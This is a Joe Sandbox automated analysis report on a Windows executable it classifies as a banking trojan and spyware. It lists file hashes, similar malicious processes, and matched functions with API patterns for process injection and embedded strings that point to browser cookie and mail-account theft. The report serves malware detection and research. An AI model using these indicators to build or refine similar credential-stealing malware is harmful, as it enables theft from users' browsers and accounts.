Joe Sandbox Class Analysis Report

Loading ...

Similarity Report

Overview

General Information

Joe Sandbox Version:23.0.0
Analysis ID:646398
Start date:28.08.2018
Start time:12:55:34
Joe Sandbox Product:Cloud
Overall analysis duration:0h 7m 43s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:Zx7i3Q9U9i (renamed file extension from none to exe)
Cookbook file name:default.jbs
Analysis system description:Windows 7 (Office 2010 SP2, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of analysed new started processes analysed:14
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:1
Technologies
  • HCA enabled
  • EGA enabled
  • HDC enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.phis.bank.troj.spyw.evad.winEXE@15/13@12/5
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 22.4% (good quality ratio 22.4%)
  • Quality average: 97.2%
  • Quality standard deviation: 6%
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 137
  • Number of non-executed functions: 173
Cookbook Comments:
  • Adjust boot time
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtDeviceIoControlFile calls found.
  • Report size getting too big, too many NtEnumerateKey calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtReadVirtualMemory calls found.

Static File Info

File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):7.988606409235657
TrID:
  • Win32 Executable (generic) a (10002005/4) 99.96%
  • Generic Win/DOS Executable (2004/3) 0.02%
  • DOS Executable Generic (2002/1) 0.02%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:Zx7i3Q9U9i.exe
File size:267776
MD5:e2476ed98a57bbb14f45fd1e04d4c43c
SHA1:999a0891ff900227f6a23b95eb708fab5caa7d78
SHA256:bd36dfdb6de9b3785f089dca00c2bbcbdd01a158b6112c5505119c3c9464ef9f
SHA512:3f31c7eebea35265d5fd6e740ca51e29ccd4b5f08f688197c4b4ee2ed81bf82643470535de070f1857a72cbf71bb012fb36659a0431b4edde5d12e29d9500e05
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q...?...?...?.......?...>...?...b...?..FN...?..FG...?.Rich..?.........................PE..L......Z...........................

Similarity Information

Algorithm:APISTRING
Total Signature IDs in Database:4106864
Total Processes Database:48838
Total similar Processes:985
Total similar Functions:23722

Similar Processes

  • Zx7i3Q9U9i.exe (MD5: E2476ED98A57BBB14F45FD1E04D4C43C, PID: 3424)
    • explorer.exe (PID: 1432, MD5: 6DDCA324434FFA506CF7DC4E51DB7935 AnalysisID: 44237 Similar Functions: 79)
    • 87024.exe (PID: 3984, MD5: 1714CF2647A549D0D7529223ACF0FC97 AnalysisID: 56552 Similar Functions: 61)
    • apdsroxy.exe (PID: 3636, MD5: B6EECE7B4FD1B4BD2626AA07E17DA9DE AnalysisID: 60981 Similar Functions: 39)
    • 111post.exe (PID: 3632, MD5: 2E3FB8B38E59480ED8F47449A46E2082 AnalysisID: 66610 Similar Functions: 37)
    • crypmgmt.exe (PID: 3868, MD5: E5C7B986B6FD3733504DB3FD6D6FAADA AnalysisID: 68428 Similar Functions: 37)
    • sort.exe (PID: 3472, MD5: A8B931811E8A8BDB83E0AFF2E1C6E560 AnalysisID: 67025 Similar Functions: 37)
    • crypmgmt.exe (PID: 3564, MD5: 3F602782259014F0253ECDEDFEF4D261 AnalysisID: 68262 Similar Functions: 37)
    • crypmgmt.exe (PID: 3816, MD5: 34C71A2B5584813A6BC94888E3669320 AnalysisID: 64003 Similar Functions: 36)
    • crypmgmt.exe (PID: 3828, MD5: 479B945127CC75C2A44ED1B13482FB07 AnalysisID: 67591 Similar Functions: 36)
    • crypmgmt.exe (PID: 3524, MD5: C007415B17DF758F2ED04850F95EE60E AnalysisID: 64002 Similar Functions: 36)
    • crypmgmt.exe (PID: 3792, MD5: 707D88A25F54B3F8785905F254974BCE AnalysisID: 63657 Similar Functions: 35)
    • foaqDTP.exe (PID: 3540, MD5: B6EECE7B4FD1B4BD2626AA07E17DA9DE AnalysisID: 60981 Similar Functions: 35)
    • gifmsg.exe (PID: 3448, MD5: 5BDD37EDD3740A4E2DA2E05ABDC20A20 AnalysisID: 60136 Similar Functions: 34)
    • gifmsg.exe (PID: 3520, MD5: 5BDD37EDD3740A4E2DA2E05ABDC20A20 AnalysisID: 60136 Similar Functions: 34)
    • crypmgmt.exe (PID: 3524, MD5: 13FFE10E12298A4E8DC1EE7A0B003B93 AnalysisID: 58680 Similar Functions: 34)
    • crypmgmt.exe (PID: 3872, MD5: 0520E2BE92296DE286739115ACA14892 AnalysisID: 57932 Similar Functions: 34)
    • 010.exe (PID: 3696, MD5: 39E01E2F5A5FBFECA5ABC01131E7E3A1 AnalysisID: 63143 Similar Functions: 33)
    • scansione_F24_.jpg.exe (PID: 3776, MD5: E5C7B986B6FD3733504DB3FD6D6FAADA AnalysisID: 68428 Similar Functions: 32)
    • crypmgmt.exe (PID: 3532, MD5: B58623B61A3D254FB9FF47FF0A4A74C6 AnalysisID: 66839 Similar Functions: 32)
    • 032901.exe (PID: 3384, MD5: F3C6625D8EDE3FE6C8C4023337D761AC AnalysisID: 66739 Similar Functions: 32)
    • wukapedof.exe (PID: 2468, MD5: AD22F7E25E6FCCF900B5060D4C5E9532 AnalysisID: 68439 Similar Functions: 32)
    • yyya.exe (PID: 3736, MD5: 479B945127CC75C2A44ED1B13482FB07 AnalysisID: 67591 Similar Functions: 32)
    • 0.exe (PID: 3388, MD5: 8905AD755F4CDCD7C4AF3FD546F67BFC AnalysisID: 65738 Similar Functions: 32)
    • 10.exe (PID: 3420, MD5: 0CEEE3CE1679E892A20AEBA2258A928C AnalysisID: 59085 Similar Functions: 32)
    • crypt_0001_1096b.exe (PID: 3720, MD5: 34C71A2B5584813A6BC94888E3669320 AnalysisID: 64003 Similar Functions: 32)
    • itera.exe (PID: 3940, MD5: 1C84D323D09233F71A6087CD5DA1F24A AnalysisID: 57776 Similar Functions: 32)
    • upsc.exe (PID: 3700, MD5: 5F53229E5AC3246C28629EE07946ADB6 AnalysisID: 63295 Similar Functions: 32)
    • crypt_0001_1096a.exe (PID: 3408, MD5: C007415B17DF758F2ED04850F95EE60E AnalysisID: 64002 Similar Functions: 31)
    • file2.exe (PID: 3684, MD5: 2B6E31835DAF786F3E9DEEC103C208BB AnalysisID: 66847 Similar Functions: 31)
    • 251287.exe (PID: 3620, MD5: 164138344D25F82E73E5E2EDB810187B AnalysisID: 544867 Similar Functions: 31)
  • d3d8sext.exe (MD5: E2476ED98A57BBB14F45FD1E04D4C43C, PID: 3520)
    • explorer.exe (PID: 1432, MD5: 6DDCA324434FFA506CF7DC4E51DB7935 AnalysisID: 37523 Similar Functions: 898)
    • cmd.exe (PID: 4004, MD5: AD7B9C14083B52BC532FBA5948342B98 AnalysisID: 544867 Similar Functions: 247)
    • apdsroxy.exe (PID: 3636, MD5: B6EECE7B4FD1B4BD2626AA07E17DA9DE AnalysisID: 60981 Similar Functions: 193)
    • crypmgmt.exe (PID: 3564, MD5: 3F602782259014F0253ECDEDFEF4D261 AnalysisID: 68262 Similar Functions: 178)
    • crypmgmt.exe (PID: 3784, MD5: AD22F7E25E6FCCF900B5060D4C5E9532 AnalysisID: 68439 Similar Functions: 172)
    • crypmgmt.exe (PID: 3888, MD5: 28093D270494BF7FD72450B008A4D71A AnalysisID: 68250 Similar Functions: 161)
    • crypmgmt.exe (PID: 3872, MD5: 0520E2BE92296DE286739115ACA14892 AnalysisID: 57932 Similar Functions: 158)
    • crypmgmt.exe (PID: 3816, MD5: 34C71A2B5584813A6BC94888E3669320 AnalysisID: 64003 Similar Functions: 156)
    • crypmgmt.exe (PID: 3868, MD5: E5C7B986B6FD3733504DB3FD6D6FAADA AnalysisID: 68428 Similar Functions: 156)
    • crypmgmt.exe (PID: 3520, MD5: 2977C206A36F6D0CEC371F9F767DE1D3 AnalysisID: 63005 Similar Functions: 155)
    • crypmgmt.exe (PID: 3524, MD5: C007415B17DF758F2ED04850F95EE60E AnalysisID: 64002 Similar Functions: 155)
    • crypmgmt.exe (PID: 3532, MD5: B58623B61A3D254FB9FF47FF0A4A74C6 AnalysisID: 66839 Similar Functions: 152)
    • crypmgmt.exe (PID: 3828, MD5: 479B945127CC75C2A44ED1B13482FB07 AnalysisID: 67591 Similar Functions: 151)
    • crypmgmt.exe (PID: 3752, MD5: 333EE1C0443D17DF5C79F6C4E40EA594 AnalysisID: 61981 Similar Functions: 150)
    • crypmgmt.exe (PID: 3568, MD5: F3C6625D8EDE3FE6C8C4023337D761AC AnalysisID: 66739 Similar Functions: 150)
    • crypmgmt.exe (PID: 3552, MD5: 2977C206A36F6D0CEC371F9F767DE1D3 AnalysisID: 63005 Similar Functions: 148)
    • crypmgmt.exe (PID: 3460, MD5: 9D985C429B23E924BB4D4ED98778EBBA AnalysisID: 67745 Similar Functions: 141)
    • crypmgmt.exe (PID: 3472, MD5: FA37EB66B10EB030E777AF9420FFCE9A AnalysisID: 66745 Similar Functions: 141)
    • crypmgmt.exe (PID: 4060, MD5: DA7FC1804FFFBD92337277B095147E63 AnalysisID: 64193 Similar Functions: 141)
    • crypmgmt.exe (PID: 2240, MD5: AD22F7E25E6FCCF900B5060D4C5E9532 AnalysisID: 68439 Similar Functions: 141)
    • crypmgmt.exe (PID: 2104, MD5: 3067FCCA87759E8F70DE41B4B5C179D9 AnalysisID: 63270 Similar Functions: 141)
    • crypmgmt.exe (PID: 3524, MD5: 13FFE10E12298A4E8DC1EE7A0B003B93 AnalysisID: 58680 Similar Functions: 141)
    • crypmgmt.exe (PID: 3912, MD5: 39E01E2F5A5FBFECA5ABC01131E7E3A1 AnalysisID: 63143 Similar Functions: 140)
    • crypmgmt.exe (PID: 3740, MD5: DA7FC1804FFFBD92337277B095147E63 AnalysisID: 64193 Similar Functions: 136)
    • crypmgmt.exe (PID: 3552, MD5: B91092360DF199385AC3DC6C3AA8A0E3 AnalysisID: 61691 Similar Functions: 135)
    • cmd.exe (PID: 2956, MD5: AD7B9C14083B52BC532FBA5948342B98 AnalysisID: 51932 Similar Functions: 134)
    • cmd.exe (PID: 3972, MD5: AD7B9C14083B52BC532FBA5948342B98 AnalysisID: 53359 Similar Functions: 133)
    • cmd.exe (PID: 2364, MD5: AD7B9C14083B52BC532FBA5948342B98 AnalysisID: 51301 Similar Functions: 133)
    • cmd.exe (PID: 2768, MD5: AD7B9C14083B52BC532FBA5948342B98 AnalysisID: 55548 Similar Functions: 133)
    • cmd.exe (PID: 3876, MD5: AD7B9C14083B52BC532FBA5948342B98 AnalysisID: 56191 Similar Functions: 133)

Similar Functions

  • Function_0000272A API ID: GetLastError$memcpymemset, String ID: , Total Matches: 409
  • Function_000177D7 API ID: GetLastError$memcpymemset, String ID: , Total Matches: 409
  • Function_0000272A API ID: GetLastError$memcpymemset, String ID: , Total Matches: 409
  • Function_00001175 API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset, String ID: , Total Matches: 388
  • Function_0001B212 API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset, String ID: , Total Matches: 388
  • Function_00001175 API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset, String ID: , Total Matches: 388
  • Function_00002368 API ID: CloseHandleCreateFileReadFileSetFilePointer, String ID: , Total Matches: 385
  • Function_00002368 API ID: CloseHandleCreateFileReadFileSetFilePointer, String ID: , Total Matches: 385
  • Function_000173C8 API ID: CloseHandleCreateFileReadFileSetFilePointer, String ID: , Total Matches: 385
  • Function_00003A60 API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile, String ID: , Total Matches: 377
  • Function_00015D18 API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile, String ID: , Total Matches: 377
  • Function_00003A60 API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile, String ID: , Total Matches: 377
  • Function_00003B0D API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile, String ID: , Total Matches: 320
  • Function_00003B0D API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile, String ID: , Total Matches: 320
  • Function_000012D2 API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset, String ID: , Total Matches: 307
  • Function_000012D2 API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset, String ID: , Total Matches: 307
  • Function_000019FB API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess, String ID: , Total Matches: 305
  • Function_000019FB API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess, String ID: , Total Matches: 305
  • Function_0000178F API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset, String ID: , Total Matches: 297
  • Function_0000178F API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset, String ID: , Total Matches: 297
  • Function_0001BC65 API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset, String ID: , Total Matches: 297
  • Function_0000321D API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject, String ID: , Total Matches: 294
  • Function_0000321D API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject, String ID: , Total Matches: 294
  • Function_00002DE6 API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError, String ID: , Total Matches: 238
  • Function_00002DE6 API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError, String ID: , Total Matches: 238
  • Function_00002E27 API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError, String ID: , Total Matches: 236
  • Function_00002E27 API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError, String ID: , Total Matches: 236
  • Function_00002880 API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset, String ID: , Total Matches: 233
  • Function_00002880 API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset, String ID: , Total Matches: 233
  • Function_00002E68 API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError, String ID: , Total Matches: 229
  • Function_00002E68 API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError, String ID: , Total Matches: 229
  • Function_000022C5 API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess, String ID: , Total Matches: 223
  • Function_00017325 API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess, String ID: , Total Matches: 223
  • Function_000022C5 API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess, String ID: , Total Matches: 223
  • Function_00003B73 API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy, String ID: , Total Matches: 218
  • Function_00003B73 API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy, String ID: , Total Matches: 218
  • Function_0001792D API ID: GetLastErrorRtlNtStatusToDosErrormemcpymemset, String ID: , Total Matches: 207
  • Function_00002F3A API ID: GetTokenInformation$CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken, String ID: , Total Matches: 204
  • Function_00000093 API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx, String ID: , Total Matches: 199
  • Function_00000093 API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx, String ID: , Total Matches: 199
  • Function_00000673 API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile, String ID: , Total Matches: 194
  • Function_00000673 API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile, String ID: , Total Matches: 194
  • Function_00001033 API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep, String ID: \\.\mailslot\msl0, Total Matches: 190
  • Function_00001034 API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep, String ID: \\.\mailslot\msl0, Total Matches: 190
  • Function_00001033 API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep, String ID: \\.\mailslot\msl0, Total Matches: 190
  • Function_00001034 API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep, String ID: \\.\mailslot\msl0, Total Matches: 190
  • Function_00001CD0 API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf, String ID: <, Total Matches: 183
  • Function_00001CD0 API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf, String ID: <, Total Matches: 183
  • Function_00000224 API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen, String ID: , Total Matches: 182
  • Function_00000224 API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen, String ID: , Total Matches: 182
  • Function_00000395 API ID: CreateProcessGetLastErrorHeapFreememset, String ID: D, Total Matches: 162
  • Function_00000186 API ID: HeapFree, String ID: Local\, Total Matches: 157
  • Function_00000186 API ID: HeapFree, String ID: Local\, Total Matches: 157
  • Function_00001427 API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess, String ID: , Total Matches: 154
  • Function_00001427 API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess, String ID: , Total Matches: 154
  • Function_0001C61D API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleep, String ID: , Total Matches: 151
  • Function_0001C75C API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleep, String ID: , Total Matches: 151
  • Function_00001E04 API ID: RegCloseKeyRegQueryValueExlstrcpy$CreateDirectoryHeapFreeRegOpenKey$RegCreateKeyRegDeleteValueRegOpenKeyExRtlAllocateHeapStrChrlstrcmpilstrlen, String ID: (, Total Matches: 146
  • Function_00001389 API ID: lstrlenmemset$GetProcAddressLoadLibrary, String ID: ~, Total Matches: 143
  • Function_00001389 API ID: lstrlenmemset$GetProcAddressLoadLibrary, String ID: ~, Total Matches: 143
  • EntryPoint API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate, String ID: , Total Matches: 141
  • Function_00000040 API ID: NtProtectVirtualMemory, String ID: z, Total Matches: 134
  • Function_0001AD3F API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset, String ID: , Total Matches: 131
  • Function_00002BF0 API ID: RegCreateKeyRegOpenKeylstrlen, String ID: , Total Matches: 129
  • Function_0000364F API ID: lstrlen$RtlAllocateHeapwsprintf, String ID: , Total Matches: 128
  • Function_0000AEAE API ID: GetLastError$CloseHandleCreateNamedPipeCreateThread, String ID: , Total Matches: 120
  • Function_000034E2 API ID: GetLastError$CloseHandleReleaseMutexWaitForMultipleObjects, String ID: , Total Matches: 117
  • Function_00002F3A API ID: CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken, String ID: , Total Matches: 114
  • Function_0001D2F9 API ID: lstrcpy$lstrlenmemcpy, String ID: , Total Matches: 113
  • Function_0000A978 API ID: GetLastError$CancelIoCloseHandleCreateEventGetOverlappedResultReadFileWaitForMultipleObjectsWriteFile, String ID: , Total Matches: 110
  • Function_000171E6 API ID: CreateEventGetCurrentProcessIdGetLastErrorGetVersionOpenProcess, String ID: , Total Matches: 108
  • Function_00002684 API ID: HeapFree$RtlAllocateHeap$lstrlenwsprintf, String ID: , Total Matches: 106
  • Function_00002682 API ID: HeapFree$RtlAllocateHeap$lstrlenwsprintf, String ID: , Total Matches: 106
  • Function_0000CF8E API ID: CloseHandleCreateThreadGetLastErrorHeapFree, String ID: , Total Matches: 105
  • Function_0000ACD2 API ID: CreateFileGetLastErrorWaitForSingleObjectWaitNamedPipe, String ID: , Total Matches: 99
  • Function_000167D8 API ID: VirtualProtect$GetLastErrorRtlEnterCriticalSectionRtlLeaveCriticalSection, String ID: , Total Matches: 97
  • Function_0001B371 API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset, String ID: d, Total Matches: 97
  • Function_00001639 API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread, String ID: , Total Matches: 95
  • Function_000010FB API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset, String ID: \\.\mailslot\msl0, Total Matches: 95
  • Function_00001639 API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread, String ID: , Total Matches: 95
  • Function_000010FB API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset, String ID: \\.\mailslot\msl0, Total Matches: 95
  • Function_00006262 API ID: CloseHandleOpenFileMappinglstrlenmemset, String ID: , Total Matches: 95
  • Function_0001B4E7 API ID: CloseHandleGetLastError$OpenProcess, String ID: , Total Matches: 95
  • Function_0001E4FD API ID: FreeLibraryGetLastErrorlstrlenmbstowcs, String ID: , Total Matches: 92
  • Function_0001699E API ID: GetModuleHandleStrChrlstrcpylstrlen, String ID: , Total Matches: 87
  • Function_0000CCA5 API ID: HeapFreeNtUnmapViewOfSectionRtlNtStatusToDosError, String ID: , Total Matches: 86
  • Function_00002122 API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy, String ID: , Total Matches: 84
  • Function_000189D2 API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy, String ID: , Total Matches: 84
  • Function_00002122 API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy, String ID: , Total Matches: 84
  • Function_0000AB92 API ID: CloseHandleGetLastError$ConnectNamedPipeCreateEventDisconnectNamedPipeFlushFileBuffersWaitForMultipleObjectsWaitForSingleObject, String ID: , Total Matches: 83
  • Function_000017F6 API ID: GetLastError$CloseHandleDuplicateHandleOpenProcessRegCloseKeyRegCreateKeyRegOpenKey, String ID: , Total Matches: 80
  • Function_00001B66 API ID: CloseHandleGetLastErrorHeapFreememset, String ID: , Total Matches: 79
  • Function_0001C885 API ID: memcpy$RtlAllocateHeaplstrlen, String ID: , Total Matches: 76
  • Function_00006341 API ID: GetLastError$CloseHandleCreateFileCreateFileMappingGetFileSizeGetTickCountHeapFreelstrcpylstrlen, String ID: Local\, Total Matches: 75
  • Function_0000D37D API ID: GetModuleHandleGetTickCountwsprintf, String ID: {%08X-%04X-%04X-%04X-%08X%04X}, Total Matches: 70
  • Function_00001884 API ID: CreateFileGetLastErrorWaitForSingleObjectlstrcat, String ID: , Total Matches: 66
  • Function_00016CFA API ID: VirtualProtect$GetLastErrorlstrcpylstrlen, String ID: , Total Matches: 65
  • Function_00002C55 API ID: HeapFreeRegCloseKeyRegQueryValueExRtlAllocateHeap, String ID: , Total Matches: 64
  • Function_0001A838 API ID: CloseHandle$LocalFreeRtlDeleteCriticalSectionRtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleepWaitForSingleObject, String ID: , Total Matches: 62
  • Function_0000671B API ID: HeapFree$CloseHandleCreateFileRtlAllocateHeaplstrlenmbstowcs, String ID: , Total Matches: 62
  • Function_000001B3 API ID: CreateDirectoryDeleteFileGetLastErrorHeapFreeRemoveDirectory, String ID: , Total Matches: 61
  • Function_00009C3A API ID: memcpy$RtlAllocateHeapmemset$HeapFreelstrcmpi, String ID: , Total Matches: 61
  • Function_00000473 API ID: HeapFreeRtlAllocateHeapwsprintf, String ID: | "%s" | %u, Total Matches: 61
  • Function_0000A593 API ID: RtlAllocateHeaplstrlen$HeapFree_wcsuprlstrcatlstrcpymemcpy, String ID: , Total Matches: 61
  • Function_00003EEE API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeaplstrcmplstrlenwsprintf, String ID: , Total Matches: 61
  • Function_000010A7 API ID: HeapFree$lstrlenmemcpy$RtlAllocateHeapSwitchToThreadlstrcpy, String ID: , Total Matches: 60
  • Function_000060F5 API ID: lstrlen$GetDriveTypeHeapFreeRtlAllocateHeapWaitForSingleObjectmemset, String ID: , Total Matches: 60
  • Function_0000D0EE API ID: GetLastError$RtlEnterCriticalSectionRtlLeaveCriticalSection, String ID: , Total Matches: 60
  • Function_00002ACC API ID: HeapFreeRtlAllocateHeaplstrlen, String ID: EMPTY, Total Matches: 59
  • Function_0000A35F API ID: CreateToolhelp32SnapshotGetModuleHandleGetProcAddressOpenThreadQueueUserAPCThread32FirstThread32Next, String ID: , Total Matches: 59
  • Function_0001D3AA API ID: memcpy$GetSystemTimeAsFileTimelstrlen, String ID: , Total Matches: 59
  • Function_00000C50 API ID: HeapFree$RtlAllocateHeaplstrcat$CreateDirectoryDeleteFilelstrlenmbstowcs, String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$\cookie.ff$\cookie.ie$\sols, Total Matches: 59
  • Function_0001A47B API ID: GetLastError$WaitForSingleObject$ReleaseMutexlstrcpynmemcpymemset, String ID: , Total Matches: 59
  • Function_00006E21 API ID: StrToIntExmemcpy, String ID: 0x, Total Matches: 59
  • Function_00008F0B API ID: HeapFreeRtlAllocateHeaplstrcpylstrcpynlstrlen, String ID: , Total Matches: 59
  • Function_00019FC4 API ID: GetLastError$VirtualAlloc$RtlEnterCriticalSectionRtlLeaveCriticalSectionSwitchToThread, String ID: , Total Matches: 59
  • Function_00006878 API ID: HeapFree$RtlAllocateHeaplstrlenwsprintf, String ID: , Total Matches: 58
  • Function_00000A08 API ID: HeapFree$GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlImageNtHeaderlstrlenwsprintf, String ID: W, Total Matches: 58
  • Function_00016222 API ID: mbstowcs, String ID: account{*}.oeaccount, Total Matches: 58
  • Function_00007CA3 API ID: HeapFreelstrlen$mbstowcswcstombs, String ID: , Total Matches: 58
  • Function_0000AD48 API ID: memcpy$CallNamedPipeGetLastErrorHeapFreeRtlAllocateHeaplstrlen, String ID: , Total Matches: 58
  • Function_00006D61 API ID: memcpy$RtlAllocateHeap, String ID: [URL]$https://, Total Matches: 58
  • Function_00009D95 API ID: memcpy$HeapFreeRtlAllocateHeaplstrcmpi, String ID: , Total Matches: 58
  • Function_000035F0 API ID: HeapFree$RegCloseKeyWaitForSingleObject, String ID: , Total Matches: 58
  • Function_000096B0 API ID: HeapFreeRtlAllocateHeapmemcpy, String ID: Access-Control-Allow-Origin:, Total Matches: 58
  • Function_000067DE API ID: HeapFreeRtlAllocateHeap, String ID: cmd /C "%s> %s1", Total Matches: 58
  • Function_0001D1CF API ID: GetComputerNameHeapFreeRtlAllocateHeap, String ID: Client, Total Matches: 57
  • Function_0001C36B API ID: SetLastErrorSleepWaitForSingleObjectmemset, String ID: vids, Total Matches: 57
  • Function_00006B90 API ID: GetSystemTimeAsFileTimeHeapFreeRtlAllocateHeaplstrlenmemcpy, String ID: , Total Matches: 57
  • Function_00001554 API ID: GetSystemTimeAsFileTimeRtlAllocateHeaplstrcpylstrlen, String ID: , Total Matches: 57
  • Function_00015DF6 API ID: GetLastError$CloseHandleSetEndOfFileSetFilePointerWaitForSingleObjectWriteFile, String ID: , Total Matches: 57
  • Function_00003E59 API ID: RtlAllocateHeaplstrcpylstrlenmemcpy, String ID: , Total Matches: 57
  • Function_000069A7 API ID: HeapFree$DeleteFileStrTrimlstrlen, String ID: ss: *.*.*.*, Total Matches: 56
  • Function_00005241 API ID: GetModuleHandleTlsAlloc, String ID: CHROME.DLL, Total Matches: 56
  • Function_000162AD API ID: DeleteFileFindFirstFileFindNextFileGetLastErrorRemoveDirectory, String ID: , Total Matches: 56
  • Function_00007B4E API ID: HeapFreememcpy$RtlAllocateHeap, String ID: , Total Matches: 56
  • Function_0000339B API ID: CreateWaitableTimerGetLastErrorGetSystemTimeAsFileTimeHeapFreeOpenWaitableTimer, String ID: , Total Matches: 56
  • Function_0000748E API ID: GetLastError$HeapFreeRtlAllocateHeapWaitForSingleObject, String ID: , Total Matches: 56
  • Function_00006E94 API ID: HeapFreememcpymemset, String ID: chun, Total Matches: 56
  • Function_00018EAA API ID: lstrlen$RtlAllocateHeap, String ID: [FILE]$DllRegisterServer, Total Matches: 56
  • Function_0001A703 API ID: CreateEventCreateMutexCreateThreadGetLastErrorRtlInitializeCriticalSectionmemcpymemset, String ID: , Total Matches: 56
  • Function_00015F2E API ID: FindFirstFile$FindCloseFindNextFileWaitForSingleObjectmemset, String ID: , Total Matches: 56
  • Function_000018FD API ID: RegCloseKeyRegOpenKeylstrcmpilstrlen, String ID: , Total Matches: 55
  • Function_0000CB50 API ID: HeapFree$RtlImageNtHeaderStrChrStrTrimlstrlen, String ID: , Total Matches: 55
  • Function_0000B42B API ID: HeapFreelstrlenmemcpy, String ID: Access-Control-Allow-Origin:, Total Matches: 55
  • Function_0000738C API ID: HeapFreeRtlAllocateHeap, String ID: https://, Total Matches: 54
  • Function_00018BD6 API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileGetFileTimeStrChrStrRChrlstrcatmemcpymemset, String ID: [FILE]$}nls, Total Matches: 54
  • Function_0000CCEC API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionSleepmemset, String ID: , Total Matches: 54
  • Function_00008D54 API ID: HeapFree$RegCloseKeyRegCreateKey, String ID: , Total Matches: 54
  • Function_00003202 API ID: HeapFreeRegCloseKeyRegOpenKeyRtlAllocateHeap, String ID: Main, Total Matches: 53
